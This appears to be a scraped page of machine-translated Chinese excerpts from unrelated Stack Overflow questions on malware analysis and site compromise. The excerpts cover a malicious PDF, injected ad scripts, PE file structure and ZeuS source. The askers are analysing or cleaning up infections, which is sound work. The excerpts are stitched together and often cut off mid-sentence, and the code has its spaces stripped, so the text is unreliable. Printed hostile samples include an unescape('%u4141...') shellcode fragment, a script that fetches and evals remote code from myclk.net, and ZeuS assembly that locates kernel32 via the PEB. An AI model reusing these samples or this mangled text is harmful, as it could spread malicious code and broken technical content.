我有一个PDF文件,我知道它包含一个JavaScript脚本文件,该文件会做一些恶意的事情,但目前还不确定是什么。我已经成功解压缩了PDF文件并获得了纯文本JavaScript源代码,但它是代码本身,如果有点隐藏在我以前从未见过的这种语法中的话。代码示例:这是大部分代码的样子varbDWXfJFLrOqFuydrq=unescape;varQgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery=bDWXfJFLrOqFuydrq('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f9
我在这个问题上有点迷茫,所以请原谅。我知道SO上还有其他关于此的主题,但我找不到答案。在网站上,当它被加载时,用户点击它的位置并不重要,它是在浏览器中打开带有广告的附加选项卡。到目前为止,通过查看浏览器控制台我能够找到的是加载了一些js文件http://cdn.mecash.ru/js/replace.js这个文件包含!function(w){if(w.self==w.top){varr=newXMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!
我们最近接到一位客户的电话,提示他们网站的页面底部有一些“看起来很奇怪的代码”。我们查看了源代码,发现templates/master中附加了大约800字节的恶意javascript代码。文件,在之后标签。我不会发布上述代码,因为它看起来特别讨厌。据我所知,除非有人可以直接访问服务器和/或FTP登录详细信息,否则无法以任何方式编辑此文件。实际文件本身已被修改,因此排除了任何类型的SQL攻击。除了一个人以物理方式获得凭据并手动修改此文件之外,对于发生的事情还有其他合乎逻辑的解释吗?有没有其他人遇到过类似的事情? 最佳答案 我要检查的地
是否有方法可以防止或使某人难以注入(inject)Javascript并操纵变量或访问函数?我有一个想法是在每次重新加载时随机更改所有var名称,以便每次都需要重写恶意软件脚本?或者还有其他不那么痛苦的方法吗?我知道最终有人会闯入,但我想知道如何使重现操作变得困难,这样人们就不会发布小书签或类似的东西供所有人使用。我不在乎专家是否在代码中找到了他们的方法,但我希望它比javascript:d=0;复杂一点如果您知道如何让破解Javascript变得更加困难,请写下来。 最佳答案 接受您的javascript将被“操纵”并在服务器端进
我正在寻找每个类别的推荐免费收费适用于可移植可执行文件(native/非.NET)恶意软件分析的易于使用的调试器。 最佳答案 在免费类别中,Olly是国王。如果您使用的是WinXP或更早版本,SoftICE也很棒,尽管现在很难找到它的副本。在付费类别中是IDAPro,Handlebars放下。克里斯·伊格尔wroteanexcellentbook向您展示如何使用IDA进行高级逆向工程。还要澄清一下Marco,UPX只能用于解压最初用UPX打包的可执行文件。许多非常复杂的恶意软件二进制文件使用自定义打包技术,无法使用UPX逆转。
我在分析一个可执行文件的格式时,在image_optional_header中找到了Baserelocationtable,这个baserelocationtable是什么? 最佳答案 重定位表是一个查找表,它列出了当文件加载到非默认基地址时需要修补的PE文件的所有部分。这是PE文件的微软规范:https://github.com/tpn/pdfs/blob/master/Microsoft%20Portable%20Executable%20and%20Common%20Object%20File%20Format%20Speci
我在研究ZeuS恶意软件时遇到了sourcecode:HMODULE_getKernel32Handle(void){#ifdefined_WIN64returnNULL;//FIXME#else__asm{cld//clearthedirectionflagfortheloopmovedx,fs:[0x30]//getapointertothePEBmovedx,[edx+0x0C]//getPEB->Ldrmovedx,[edx+0x14]//getthefirstmodulefromtheInMemoryOrdermodulelistnext_mod:movesi,[edx+0x
我正在通过机器学习方法进行Windows恶意软件研究。我看了PE格式,用dumpbin解压PE文件,发现里面有很多部分。例如:.idata.edata.pdata.data.rdata.sxdata.text.rscr.tls...但并非所有这些都用于Action/行为。我只关心他们的行为并在下一步之前减少大数据。谢谢 最佳答案 由于您正在分析恶意软件,因此不应查看部分的名称。恶意软件开发人员更改节的名称并不困难,而且msvc编译器还允许您创建自定义节。您应该做的是查看各个部分的特征。通过读取IMAGE_SECTION_HEADER
所以,我创建了一个python程序。使用Py2Exe转换为exe,并尝试使用PyInstaller和cx_freeze。所有这些都会触发该程序被avast、avg和其他在virustotal和我的本地计算机上检测为病毒。我尝试更改为HelloWorld脚本以查看问题是否存在,但结果完全相同。我的问题是,是什么触发了这种检测?.exe的创建方式?如果是这样,是否有其他Py2exe、Pyinstaller、cx_freeze的替代品? 最佳答案 你可以试试nuitka。pipinstall-Unuitka例子:nuitka--recur
在我的网站上遇到了一些讨厌的javascript恶意软件。我知道每个有问题的代码块都以以下内容开头:以结尾我想通过Windows上的正则表达式删除讨厌的位,使用某种免费软件正则表达式替换工具。这里有什么建议吗?非常感谢。 最佳答案 您可能想尝试UltraEdit,它有一个内置的正则表达式搜索/替换,效果很好。此外,我相信该演示可以使用30天。如果您只想从页面中删除所有Javascriptblock,您可以搜索:(\s=whitespace,\S=non-whitespace,\p=newlinecharacters)确保您在搜索/替
